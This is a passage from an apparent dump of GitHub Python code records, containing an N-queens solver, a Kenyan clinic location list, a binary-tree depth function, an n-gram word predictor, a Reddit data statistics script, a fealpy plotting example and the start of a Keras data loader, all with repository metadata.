False, False ])\n declension = random.choice(language.misc.declensions)\n\n article = random.choice(language.words.articles)\n words.append(article + declension)\n\n if include_adjective:\n adjective = random.choice(language.words.adjectives)\n words.append(adjective + declension)\n\n noun = random.choice(language.words.nouns)\n words.append(noun + declension)\n\n return \" \".join(words)\n\ndef predicate():\n 
global language\n conjugation = random.choice(language.misc.conjugations)\n return random.choice(language.words.verbs) + conjugation\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HumanoidSandvichDispenser/pseudolanguage","sub_path":"generate-sentence.py","file_name":"generate-sentence.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42179340702","text":"#!/usr/bin/python3\nimport sys\n\"\"\"\nA module that contains a function that performs backtracking\nto return the number of valid placing for Non-attacking queens\n\"\"\"\n\n\ndef nqueens(N, col, not_safe=set([]), main=0):\n \"\"\"\n The nqueens function performs recursive backtracking to\n print out the various combinations for the a non-attacking\n queens of NxN chessboard\n \"\"\"\n if col >= N:\n return [[]]\n\n init = set(not_safe)\n solution = []\n possibilities = []\n for i in range(N):\n if (col, i) not in not_safe:\n solution.append([col, i])\n c = col\n rf = rb = i\n\n while c < N - 1:\n c += 1\n rf += 1\n not_safe.add((c, i))\n not_safe.add((c, rf))\n if rb >= 1:\n rb -= 1\n not_safe.add((c, rb))\n mat = nqueens(N, col + 1, not_safe)\n if mat is not None:\n for possible in mat:\n possibilities.append(solution + possible)\n solution = []\n else:\n solution.pop()\n not_safe.clear()\n not_safe.update(init)\n if main:\n for p in possibilities:\n print(p)\n if len(possibilities) > 0:\n return possibilities\n return None\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"Usage: nqueens N\")\n sys.exit(1)\n try:\n n = int(sys.argv[1])\n except (TypeError, ValueError):\n print(\"N must be a number\")\n sys.exit(1)\n if n < 4:\n print(\"N must be at least 4\")\n sys.exit(1)\n nqueens(n, 0, main=1)\n","repo_name":"shady-cj/alx-higher_level_programming","sub_path":"0x08-python-more_classes/101-nqueens.py","file_name":"101-nqueens.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40739238597","text":"locations = [\n {\n \"area\": \"Nyahururu\",\n \"county\": \"Nakuru\",\n \"link\": \"https://goo.gl/maps/57ZgCVDQZsqyFhvD8\",\n \"name\": \"Equity Afia Medical Centre, Nyahururu\",\n \"building\": \"Pongezi Mbaria Complex Building\",\n \"tel\": \"0765 000240\",\n \"email\": \"nyahururureception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kabsabet\",\n \"county\": \"Nandi\",\n \"link\": \"https://goo.gl/maps/nJKW9Mggvf89c1px8\",\n \"name\": \"Equity Afia Medical Centre, Kapsabet\",\n \"building\": \"Sonoiya Heights 1st Floor\",\n \"tel\": \"0765 000020\",\n \"email\": \"kapsabetreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kahawa Sukari\",\n \"county\": \"Nairobi/Kiambu\",\n \"link\": \"\",\n \"name\": \"Equity Afia Medical Centre, Kahawa Sukari\",\n \"building\": \"Ruhan plaza 2nd floor\",\n \"tel\": \"0765 000022\",\n \"email\": \"kahawasukarireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Donholm\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/ob8qfmvgpfPPeAPh6\",\n \"name\": \"Equity Afia Medical Centre, Donholm\",\n \"building\": \"Along Savannah Road\",\n \"tel\": \"0765 000038\",\n \"email\": 
\"donholmreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kakuma\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/ZZJqPTRx4d5Radxw5\",\n \"name\": \"Equity Afia Medical Centre, Kakuma\",\n \"building\": \"Opposite Lucky Petrol station\",\n \"tel\": \"0765 000110\",\n \"email\": \"kakumareception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Nkubu\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/BZXKor81EvTcHnpi7\",\n \"name\": \"Equity Afia Medical Centre, Nkubu\",\n \"building\": \"Next to KCB Building, 1st Floor\",\n \"tel\": \"0765 000108\",\n \"email\": \"eqankubureception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kinoo\",\n \"county\": \"Nairobi\",\n \"link\": \"\",\n \"name\": \"Equity Afia, Kinoo\",\n \"building\": \"Tatahotte Plaza Ground Floor along Chiefs road\",\n \"tel\": \"0765 000154 \",\n \"email\": \"kinooreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Chavakali\",\n \"county\": \"Kakamega\",\n \"link\": \"https://goo.gl/maps/WNByfzFGidccziFYA\",\n \"name\": \"Equity Afia Medical Centre, Chavakali\",\n \"building\": \"Ahulwo Plaza, next to Rubis Along Ksm -Kakamega Road.\",\n \"tel\": \"0765 000106\",\n \"email\": \"Chavakalireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Chokaa\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/kesLFehXz8xnhMM2A\",\n \"name\": \"Equity Afia Medical Centre, Chokaa\",\n \"building\": \"Hurlingham 2nd Avenue, Off Kangundo Road\",\n \"tel\": \"0765 000229\",\n \"email\": \"chokaareception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kimbo\",\n \"county\": \"Kiambu\",\n \"link\": \"https://goo.gl/maps/BWxkcf7NG1g87Mv46\",\n \"name\": \"Equity Afia Medical Centre, Kimbo\",\n \"building\": \"Lake oil petrol station, Matangi Road\",\n \"tel\": \"0765 000163\",\n \"email\": \"kimboreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Voi\",\n \"county\": \"Taita-Taveta\",\n \"link\": \"https://goo.gl/maps/2s1JYEGfqXnFjDSU7\",\n \"name\": \"Equity Afia Medical Centre, Voi\",\n \"building\": \"Maghaba Plaza Ground Floor, Kenya Power Street\",\n \"tel\": \"0765 000101\",\n \"email\": \"voireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Marsabit\",\n \"county\": \"Marsabit\",\n \"link\": \"https://goo.gl/maps/Wq6HmUjzwFDvX6Vq7\",\n \"name\": \"Equity Afia Medical Centre, Marsabit\",\n \"building\": \"Lekuton Building, Ground Floor, next to Huduma Centre\",\n \"tel\": \"0765 000066\",\n \"email\": \"marsabitreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kagemi\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/G95swKupmXFeAj7g8\",\n \"name\": \"Equity Afia Medical Centre, Kagemi\",\n \"building\": \"Range Chem Towers, 2nd Floor (Near Mountain View Mall), Waiyaki Way\",\n \"tel\": \"0765 
000094\",\n \"email\": \"kagemireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Thika-Makongeni\",\n \"county\": \"Kiambu\",\n \"link\": \"https://goo.gl/maps/FBjtBFx2ejWqJAta7\",\n \"name\": \"Equity Afia Medical Centre, Thika-Makongeni\",\n \"building\": \"Makongeni Plaza, \",\n \"tel\": \"0765 000109\",\n \"email\": \"makongenireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Roysambu\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/zhqqaKLynSMd6oKJ9\",\n \"name\": \"Equity Afia Medical Centre, Roysambu\",\n \"building\": \"Shell Petrol Station-Mirema, along Kamiti Road\",\n \"tel\": \"0765 000098\",\n \"email\": \"roysambureception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Kapenguria\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/B9UVtj1hK3KXUKhM8\",\n \"name\": \"Equity Afia Medical Centre, Kapenguria\",\n \"building\": \"Laikong House 2nd Floor Opposite Main Stage\",\n \"tel\": \"0765 000103\",\n \"email\": \"kapenguriareception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Wote\",\n \"county\": \"Machakos\",\n \"link\": \"https://goo.gl/maps/a9sHqMxsLPtGEm1D9\",\n \"name\": \"Equity Afia Medical Centre, Wote\",\n \"building\": \"Nesa Plaza 1st floor Opposite Rubis Petrol station - Machakos Wote Road\",\n \"tel\": \"0765 000105\",\n \"email\": \"wotereception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Westlands\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/WhZwi7KmyLkLuEtF8\",\n \"name\": \"Equity Afia, Westlands\",\n \"building\": \"Reliance Centre 1st Floor, Woodvale Groove\",\n \"tel\": \"0765 000095\",\n \"email\": \"westlandsreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Hola\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/eVJD7Fmz6f9BQE4P9\",\n \"name\": \"Equity Afia, Hola\",\n \"building\": \"Next to Ardhi House, Country Road\",\n \"tel\": \"0765 000091\",\n \"email\": \"holareception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Moi-Avenue\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/PcL6Qd446stsbxXz7\",\n \"name\": \"Equity Afia, Moi-Avenue\",\n \"building\": \"4th floor Agrho House, Moi Avenue, Nairobi CBD\",\n \"tel\": \"0765 000090\",\n \"email\": \"moiavenuereception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Tivoli\",\n \"county\": \"Kisumu\",\n \"link\": \"https://goo.gl/maps/nUwQ1GXiMoni3vzg6\",\n \"name\": \"Equity Afia, Tivoli\",\n \"building\": \"Tivoli Centre, First floor Opposite City Hall Off Achieng Oneko Road\",\n \"tel\": \"0765 000104\",\n \"email\": \"kisumureception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Githunguri\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/tSxuU63ha9Rb7f8n8\",\n \"name\": \"Equity Afia, Githunguri\",\n \"building\": \"K-unity Building, 
Githunguri Town\",\n \"tel\": \"0765 000099\",\n \"email\": \"githungurireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Lodwar\",\n \"county\": \"Turkana\",\n \"link\": \"https://goo.gl/maps/2umQdpv7Mtz1iwwS9\",\n \"name\": \"Equity Afia, Lodwar\",\n \"building\": \"Kanamkemer along Robert Junction, Catholic Road opposite Emojong Hardware\",\n \"tel\": \"0765 000068\",\n \"email\": \"lodwarreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am -12 midnight\",\n \"Weekends\": \"8.00 am - 7.00 pm\"\n }\n },\n {\n \"area\": \"Kiserian\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/bP4pF8aYpQ4qibW47\",\n \"name\": \"Equity Afia, Kiserian\",\n \"building\": \"Mathathi Business Centre, Magadi Road\",\n \"tel\": \"0765 000080\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Eldoret\",\n \"county\": \"Uasin Gishu\",\n \"link\": \"https://goo.gl/maps/J2RquH1SiXQKVA2S8\",\n \"name\": \"Equity Afia, Eldoret\",\n \"building\": \"Faulu Building 1st Floor along Uganda Road (Opposite Catholic Cathedral)\",\n \"tel\": \"0765 000070\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Ruai\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/tteFpMeV2Jhky4vV7\",\n \"name\": \"Equity Afia, Ruai\",\n \"building\": \"Woodlands Plaza, Equity Bank building along Kangundo Road\",\n \"tel\": \"0765 000081\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"9.00 am to 8.00 pm\"\n }\n },\n {\n \"area\": \"Kariobangi\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/tP6KziRG8Ux4YXwi7\",\n \"name\": \"Equity Afia, Kariobangi\",\n \"building\": \"Along Outering Road, Near Equity Bank\",\n \"tel\": \"0765 000083\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"9.00 am to 8.00 pm\"\n }\n },\n {\n \"area\": \"Lavington\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/5XzUcMEvmqj5KDyU7\",\n \"name\": \"Equity Afia, Lavington\",\n \"building\": \"Lavington Mall, 3rd Floor, James Gichuru Road\",\n \"tel\": \"0765 000086\",\n \"email\": \"lavingtonreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"\",\n \"Weekends\": \"\"\n }\n },\n {\n \"area\": \"Umoja\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/kefDTkcgLWEdhMsj7\",\n \"name\": \"Equity Afia, Umoja\",\n \"building\": \"Moi Drive - Opposite PCEA Umoja 1\",\n \"tel\": \"0765 000084\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"10.00 am to 6.00 pm on Sundays\"\n }\n },\n {\n \"area\": \"Kerugoya\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/24LZs9biosoqMhd47\",\n \"name\": \"Equity Afia, Kerugoya\",\n \"building\": \"Anchor Plaza, 1st Floor Hospital road\",\n \"tel\": \"0765 000088\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"9.00 am to 6.00 pm on Sundays\"\n }\n },\n {\n \"area\": \"Mountain Mall\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/uLbLRiKNbQ3zh87C8\",\n \"name\": \"Equity Afia, Mountain Mall\",\n \"building\": \"2nd Floor Mountain 
Mall Building along Thika Road\",\n \"tel\": \"0765 000069\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.30 am to 7.30 pm\",\n \"Weekends\": \"8.30 am to 7.30 pm\"\n }\n },\n {\n \"area\": \"Eastleigh\",\n \"county\": \"Nairobi\",\n \"link\": \"\",\n \"name\": \"Equity Afia, Eastleigh\",\n \"building\": \"Off General Waruingi Road, near Ismariot hotel\",\n \"tel\": \"0765 000085\",\n \"email\": \"https://goo.gl/maps/ULNwv6JqB8u4h12y9\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"10.00 am to 6.00 pm on Sundays\"\n }\n },\n {\n \"area\": \"Machakos\",\n \"county\": \"Machakos\",\n \"link\": \"https://goo.gl/maps/i5kWCyyg3hGfNDGWA\",\n \"name\": \"Equity Afia Medical Centre, Machakos\",\n \"building\": \"Kiamba Mall 2nd floor, Along Ngei Road\",\n \"tel\": \"0765 000067\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 7.00 pm\",\n \"Weekends\": \"9.00 am to 5.00 pm\"\n }\n },\n {\n \"area\": \"Juja\",\n \"county\": \"Kiambu\",\n \"link\": \"https://goo.gl/maps/fcTQAHr4aKmnLxt46\",\n \"name\": \"Equity Afia, Juja\",\n \"building\": \"Kalimoni Highwayview Plaza, Ground Floor, Near Juja Bridge\",\n \"tel\": \"0765 000062\",\n \"email\": \"jujareception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"9.00 am to 9.00 pm\",\n \"Weekends\": \"9.00 am to 7.30 pm\"\n }\n },\n {\n \"area\": \"Kitui\",\n \"county\": \"Kitui\",\n \"link\": \"https://goo.gl/maps/uqbgru8TEPjEENxv7\",\n \"name\": \"Equity Afia, Kitui\",\n \"building\": \"C House, 2nd Floor, Kitui-Kibwezi Road opp. Maguna Supermarket\",\n \"tel\": \"0765 000058\",\n \"email\": \"kituireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 7.00 pm\",\n \"Weekends\": \"9.00 am to 6.00 pm\"\n }\n },\n {\n \"area\": \"SouthB\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/xjmGy3uxed3Te6HX9\",\n \"name\": \"Equity Afia, South B\",\n \"building\": \"Vumira House, 1st Floor, Mchumbi Road, South B Shopping Centre\",\n \"tel\": \"0765 000061\",\n \"email\": \"southbreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 7.00 pm\",\n \"Weekends\": \"9.00 am to 6.00 pm\"\n }\n },\n {\n \"area\": \"Ngong Road\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/unFDjoLEd6WsrMcm8\",\n \"name\": \"Equity Afia, Ngong Road\",\n \"building\": \"KISM Towers, 1st Floor, Ngong Road, near Prestige Mall\",\n \"tel\": \"0765 000056\",\n \"email\": \"ngongroadreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 7.00 pm\",\n \"Weekends\": \"9.00 am to 5.00 pm only on Saturday\"\n }\n },\n {\n \"area\": \"Pangani\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/DSYrTKkqytgtyp4q9\",\n \"name\": \"Equity Afia, Pangani\",\n \"building\": \"Goodwill Building Ground Floor-Agoi Road, Pangani Shopping Centre\",\n \"tel\": \"0765 000065\",\n \"email\": \"panganireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"24 hrs\",\n \"Weekends\": \"24 hrs\"\n }\n },\n {\n \"area\": \"Murang'a\",\n \"county\": \"Murang'a\",\n \"link\": \"https://goo.gl/maps/3BQsZiWmpLMyGcYUA\",\n \"name\": \"Equity Afia, Murang'a\",\n \"building\": \"ECN Building Ground & 1st Floor, Uhuru Street near National oil Petrol Station, Opp Absa bank\",\n \"tel\": \"0765 000052\",\n \"email\": 
\"Murangareception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"9.00 am to 6.00 pm\"\n }\n },\n {\n \"area\": \"Kisii\",\n \"county\": \"Kisii\",\n \"link\": \"https://goo.gl/maps/Am5gE5HyL3QLKQVC9\",\n \"name\": \"Equity Afia, Kisii\",\n \"building\": \"Ouru Complex, 3rd floor Kisii-Kisumu Highway\",\n \"tel\": \"0765 000053\",\n \"email\": \"kisiireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"8.00 am to 8.00 pm\"\n }\n },\n {\n \"area\": \"Matuu\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/9qaT2prT9LaYxP1V6\",\n \"name\": \"Equity Afia, Matuu\",\n \"building\": \"3rd Floor, A1 Plaza, along KC Road, Matuu\",\n \"tel\": \"\",\n \"email\": \"matuureception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"9.00 am to 7.00 pm\"\n }\n },\n {\n \"area\": \"Kenol\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/DQxLmNs1aCwQ3pxR8\",\n \"name\": \"Equity Afia, Kenol\",\n \"building\": \"Equity Bank Building, Mbotco Plaza, First Floor along Kenol Sagana Road\",\n \"tel\": \"0765 000049\",\n \"email\": \"kenolreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"9.00 am to 6.00 pm\"\n }\n },\n]\n","repo_name":"VinGitonga/eazzy-afia","sub_path":"backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":19220,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"28613530977","text":"from collections import deque\n\n\ndef MaximumDepthOfBinaryTree(root) -> int:\n if not root:\n return 0\n queue = deque([root])\n depth = 0\n\n while queue:\n for i in range(len(queue)):\n node = queue.popleft()\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n depth += 1\n return depth","repo_name":"sillypoise/ds-algo","sub_path":"Problems/01. 
Easy/Maximum Depth of Binary Tree/Python/MaximumDepthOfBinaryTree.py","file_name":"MaximumDepthOfBinaryTree.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42414922987","text":"from back_off_model import back_off_model\r\n\r\n\r\ndef predict(trigram, bigram, unigram, test):\r\n count = 0\r\n\r\n values = list(unigram.values())\r\n values.sort()\r\n values.reverse()\r\n bad_selected_words = []\r\n\r\n for k, v in unigram.items():\r\n if v in values[0:75]:\r\n bad_selected_words.append(k)\r\n\r\n answer = []\r\n with open('labels.txt', 'r') as file:\r\n answer = file.readlines()\r\n answer = list(map(lambda x: x.split(', ')[1].split('\\n')[0].lower(), answer))\r\n correct = 0\r\n mishe = []\r\n\r\n for t in test:\r\n probable_word = {}\r\n for k in trigram.keys():\r\n p = back_off_model(k, trigram, bigram, unigram)\r\n\r\n if k.__contains__('|' + t[0] + ' ' + t[1]):\r\n word = k.split('|')[0]\r\n if word not in probable_word.keys():\r\n if word in unigram.keys():\r\n probable_word[word] = p\r\n else:\r\n probable_word[word] += p\r\n if k.__contains__(t[3] + '|' + t[1]):\r\n word = k.split(' ')[1]\r\n if word not in probable_word.keys():\r\n if word in unigram.keys():\r\n probable_word[word] = p\r\n else:\r\n probable_word[word] = p\r\n if k.__contains__(t[4] + '|') and k.__contains__(' ' + t[3]):\r\n word = k.split('|')[1].split(' ')[0]\r\n if word not in probable_word.keys():\r\n if word in unigram.keys():\r\n probable_word[word] = p\r\n else:\r\n probable_word[word] = p\r\n\r\n for k in bigram.keys():\r\n\r\n if k.__contains__('|' + t[1]):\r\n word = k.split('|')[0]\r\n\r\n p1 = back_off_model(word + '|' + t[0] + ' ' + t[1], trigram, bigram, unigram)\r\n p2 = back_off_model(t[3] + '|' + t[1] + ' ' + word, trigram, bigram, unigram)\r\n p3 = back_off_model(t[4] + '|' + word + ' ' + t[3], trigram, bigram, unigram)\r\n\r\n if word not in probable_word.keys():\r\n if word in unigram.keys():\r\n probable_word[word] = p1 + p2 + p3\r\n\r\n else:\r\n probable_word[word] += p1 + p2 + p3\r\n\r\n if k.__contains__(t[3] + '|'):\r\n\r\n word = k.split('|')[1]\r\n p1 = back_off_model(word + '|' + t[0] + ' ' + t[1], trigram, bigram, unigram)\r\n p2 = back_off_model(t[3] + '|' + t[1] + ' ' + word, trigram, bigram, unigram)\r\n p3 = back_off_model(t[4] + '|' + word + ' ' + t[3], trigram, bigram, unigram)\r\n\r\n if word not in probable_word.keys():\r\n if word in unigram.keys():\r\n probable_word[word] = p1 + p2 + p3\r\n else:\r\n probable_word[word] += p1 + p2 + p3\r\n\r\n pr_word = {}\r\n for key, pr in probable_word.items():\r\n if key not in bad_selected_words:\r\n pr_word[key] = pr\r\n print(pr_word.keys())\r\n\r\n try:\r\n max_probability = max(pr_word.values())\r\n except:\r\n max_probability = 0\r\n\r\n count += 1\r\n if answer[count - 1] in probable_word:\r\n mishe.append(answer[count - 1])\r\n\r\n words = []\r\n for k, v in pr_word.items():\r\n if v == max_probability:\r\n words.append(v)\r\n print(count, k, v)\r\n if answer[count - 1] == k:\r\n correct += 1\r\n print('correct')\r\n break\r\n\r\n print('correct = ' + str(correct))\r\n print('Accuracy =', int(correct) / 80)\r\n # print(mishe)\r\n","repo_name":"its-kz-again/AI_project-nlp-","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40709325634","text":"#!/usr/bin/env python3\n#\n\nimport 
numpy as np\nimport matplotlib.pyplot as plt\n\nfrom fealpy.pde.time_fractional_2d import FisherData2d\nfrom mpl_toolkits.mplot3d import Axes3D\n\npde = FisherData2d()\n\nmesh = pde.init_mesh(n=5)\ntimeline = pde.time_mesh(0, 1, 100)\n\nnode = mesh.entity('node')\ncell = mesh.entity('cell')\n\nuI = pde.solution(node, 1.0)\n\nfig = plt.figure()\naxes = fig.gca(projection='3d')\naxes.plot_trisurf(node[:, 0], node[:, 1], cell, uI, cmap=plt.cm.jet, lw=0.0)\n\nplt.show()\n\n","repo_name":"weihuayi/fealpy","sub_path":"example/oldexample/oldexample/TimeFractionalFEMRate2d.py","file_name":"TimeFractionalFEMRate2d.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"41608928955","text":"import pandas as pd\nimport os\nimport sys\nimport argparse as arg\nfrom tqdm import tqdm\n\nparser = arg.ArgumentParser()\nparser.add_argument('dir_path', type=str, help='directory or path file to predict')\nparser.add_argument('pred', choices=('C1', 'C2', 'False'), help='use prediction or not')\n\nargs = parser.parse_args(sys.argv[1:])\nfiles = os.listdir(os.path.join('../../Files/', args.dir_path))\nfiles = [file for file in files if file.endswith('.pickle')]\n\n\nif args.pred == 'C1':\n    dictiona = {}\n    for file in tqdm(files):\n        \n        df = pd.read_pickle(os.path.join('../../Files/', args.dir_path ,file))\n        filename = file[0:-7]\n        # print(f'tabulating {filename}')\n        dictiona[filename] = [len(df), len(df[df['class_I'] == 0]), len(df[df['class_I'] == 1]), len(df['author'].unique())]\n    \n    df = pd.DataFrame.from_dict(dictiona, orient='index', columns=['posts', 'Non-Covid', 'Covid', 'authors'])\n\n\nelif args.pred == 'C2':\n    files = [file for file in files if file.startswith('d_')]\n    dictiona = {}\n    for file in tqdm(files):\n        \n        df = pd.read_pickle(os.path.join('../../Files/', args.dir_path ,file))\n        filename = file[2:-7]\n        # print(f'tabulating {filename}')\n        df = df[df['class_I'] == 1]\n        dictiona[filename] = [len(df), len(df[df['class_II'] == 0]), len(df[df['class_II'] == 1]), len(df[df['class_II'] == 2]), len(df['author'].unique())]\n    \n    df = pd.DataFrame.from_dict(dictiona, orient='index', columns=['posts', 'posts_anti', 'posts_neutral', 'posts_pro', 'authors'])\n\nelif args.pred == 'False':\n    dictiona = {}\n    for filename in os.listdir(os.path.join('../../Files/', args.dir_path)):\n        if filename.endswith('.pickle'):\n            df = pd.read_pickle(os.path.join('../../Files/', args.dir_path ,filename))\n            file = filename[:-7]\n            print(f'tabulating {file}')\n            dictiona[file] = [len(df), len(df['author'].unique())]\n    \n    df = pd.DataFrame.from_dict(dictiona, orient='index', columns=['posts', 'authors'])\n\n\n\n\n\ndf.to_csv(os.path.join('../../Files/', args.dir_path, 'EDA_stats.csv'))","repo_name":"jvschlierf/networkthesis","sub_path":"analysis/EDA_stats.py","file_name":"EDA_stats.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6212496708","text":"from keras.utils import Sequence\nimport numpy as np\nimport sys,os\n\ndef load_files(batch):\n    images = []\n    labels = []\n    for i in batch:\n        x = np.load(i,allow_pickle=True,encoding='latin1')['arr_0'].item()\n        keys = 